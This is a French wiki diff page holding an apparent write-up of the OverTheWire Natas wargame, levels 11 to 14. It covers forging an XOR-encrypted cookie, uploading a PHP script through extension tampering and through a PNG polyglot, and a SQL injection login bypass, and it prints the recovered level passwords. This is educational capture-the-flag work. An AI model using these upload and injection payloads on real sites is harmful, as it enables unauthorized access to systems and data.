Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

--- natas_wargame [2012/11/09 14:43]
TechBrunch
+++ natas_wargame [2017/04/09 15:33] (Version actuelle)
@@ Ligne 313: / Ligne 313: @@
 ===== Level 11 =====
+Voici le code du level 11 :
 <code php>
 <?
-function genRandomString() {
+$defaultdata = array( "showpassword";=>"no", "bgcolor";=>"#ffffff");
-    $length = 10;
-    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
-    $string = "";
-    for ($p = 0; $p < $length; $p++) {
+function xor_encrypt($in) {
-        $string .= $characters[mt_rand(0, strlen($characters)-1)];
+    $key = '<censored>';
-    }
+    $text = $in;
+    $outText = '';
-    return $string;
+    // Iterate through each character
-}
+    for($i=0;$i<strlen($text);$i++) {
+    $outText .= $text[$i] ^ $key[$i % strlen($key)];
+    }
-function makeRandomPath($dir, $ext) {
+    return $outText;
-    do {
+}
-    $path = $dir."/".genRandomString().".".$ext;
-    } while(file_exists($path));
-    return $path;
-}
-function makeRandomPathFromFilename($dir, $fn) {
+function loadData($def) {
-    $ext = pathinfo($fn, PATHINFO_EXTENSION);
+    global $_COOKIE;
-    return makeRandomPath($dir, $ext);
+    $mydata = $def;
-}
+    if(array_key_exists("data", $_COOKIE)) {
+    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
+    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
+        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
+        $mydata['showpassword'] = $tempdata['showpassword'];
+        $mydata['bgcolor'] = $tempdata['bgcolor'];
+        }
+    }
+    }
+    return $mydata;
+}
-if(array_key_exists("filename", $_POST)) {
+function saveData($d) {
-    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
+    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
+}
-        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
+$data = loadData($defaultdata);
-        echo "File is too big";
-    } else {
-        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
-            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
-        } else{
-            echo "There was an error uploading the file, please try again!";
-        }
-    }
-} else {
-?>;
-&lt;form enctype="multipart/form-data" action=";index.php" method="POST";>
+if(array_key_exists(&quot;bgcolor",$_REQUEST)) {
-<input type=&quot;hidden&quot; name=&quot;MAX_FILE_SIZE&quot; value="1000" />
+    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
-<input type="hidden&quot; name=&quot;filename"; value="<? print genRandomString(); ?>.jpg&quot; />
+        $data['bgcolor'] = $_REQUEST['bgcolor'];
-Choose a JPEG to upload (max 1KB):<br/>
+    }
-<input name="uploadedfile" type="file" /&gt;<br />
+}
-<input type=&quot;submit" value="Upload File" />;
-</form>
+saveData($data);
-<? } ?>
+?>
+<h1&gt;natas11&lt;/h1&gt;
+&lt;div id="content">
+<body style="background: &lt;?=$data['bgcolor']?&gt;;">
+Cookies are protected with XOR encryption&lt;br/><br/>
+<?
+if($data["showpassword"] == "yes") {
+    print &quot;The password for natas12 is <censored><br&gt;";
+}
+?>
 </code>
+Que fait ce code ?
+  - Recherche d'un cookie encrypté nommé data comprenant deux informations showpassword et bgcolor
+  - S'il existe il charge la couleur stockée
+  - Sinon il prend une valeur par défaut
+  - S'il y a modification ou pas il stocke la valeur du cookie
+L'objectif étant de modifier la valeur du cookie afin que show password devienne égale à Yes, problème la cookie est encrypté. Il va donc falloir d'abord trouvé la clé qui permet de crypter le cookie.
+Si on jette un oeil à la fonction qui permet de crypter le cookie on s'aperçoit que la fonction n'effectue qu'un simple XOR. Pour retrouver la clé d'origine j'ai donc légèrement modifié la fonction de cryptage afin de retomber sur la clé.
 <code php>
@@ Ligne 381: / Ligne 405: @@
 </code>
+En effet on sait que A ^ B = C donne C ^ A = B. Il suffit alors de faire un echo de la fonction antixor sur un cookie dont on connait la contenue.
+<file>
 echo antixor(base64_decode("ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw"));
+</file>
-$key = 'qw8J';
+On trouve alors que la clé est "qw8J"; car le motif se répète. Une fois qu'on a la clé il suffit de la remplacer dans la fonction xor_encrypt et de l'utiliser sur un cookie dont on aura au préalable modifier la valeur du showpassword.
-$defaultdata = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
+<file>
+$yes = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
 echo "<p>".base64_encode(xor_encrypt(json_encode($defaultdata)))."</p>";
+</file>
+Ce qui nous donne :
+<file>
+ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
+</file>
+On modifie donc la valeur du cookie, on recharge la page et c'est dans la poche :
+>The password for natas12 is sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu
 ===== Level 12 =====
+Code source du level 12 :
 <code php>
@@ Ligne 444: / Ligne 485: @@
 </code>
+On se retrouve devant un formulaire d'uploader une image au format JPEG. Le nom du fichier est randomisé grâce à la fonction genRandomString cependant l'extension est écrite en dure dans le formulaire.
+On va donc créer un petit fichier php permettant d'afficher la clé vers le prochain niveau :
 <code php>
@@ Ligne 450: / Ligne 494: @@
 ?>
 </code>
+On modifie l'extension en éditant le code source de la page et on upload le fichier.
 >The file upload/cprocjo1uj.php has been uploaded
+Le fichier est bien uplaodé avec l'extension php il ne reste plus qu'a naviguer à l'adresse du fichier pour voir apparaître la clé :
 <file>
@@ Ligne 459: / Ligne 507: @@
 ===== Level 13 =====
+Le niveau 13 est le même que le niveau 12 à un détail près, un test est fait pour vérifier que le fichier uploadé est bien une image.
 <code php>
@@ Ligne 466: / Ligne 516: @@
 </code>
+Pour contourner cette protection j'ai créé une image d'1 pixel et j'ai collé à la suite mon script php. Le fichier est uploadé correctement et lorsque l'on charge l'image on se retrouve avec ceci :
+<file>
+‰PNG  IHDRwSÞsRGB®ÎégAMA±üa	pHYsÃÃÇo¨dIDATWcø¹i`ö–ºOIEND®B`‚ sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh
+</file>
+La clé étant : sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh
 ===== Level 14 =====
+Code source du level 14 :
 <code php>
@@ Ligne 490: / Ligne 549: @@
 </code>
->Executing query: SELECT * from users where username="a" and password="b" or "a"="a"
+On se retrouve devant un code vulnérable au injection SQL car les paramètres Username et Password ne sont pas du tout filtrés.
+Si on utiliser pour username a et comme password : a" or "a"="a :
+>http://natas14.natas.labs.overthewire.org/?debug&username=a&password=a" or "a"="a
+Le requête sera toujours vrai et donc elle retournera l'ensemble des comptes.
+>Executing query: SELECT * from users where username="a" and password="a" or "a"="a"
 >Successful login! The password for natas15 is m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV
 ===== Level 15 =====
+La solution sur [[http://www.techbrunch.fr/securite/wargame-natas-writeup-level-15/]]
 ===== Level 16 =====
@@ Ligne 500: / Ligne 569: @@
 ===== Level 17 =====

Zenk - Security

Outils d'utilisateurs

Outils du Site

Différences

Outils de la Page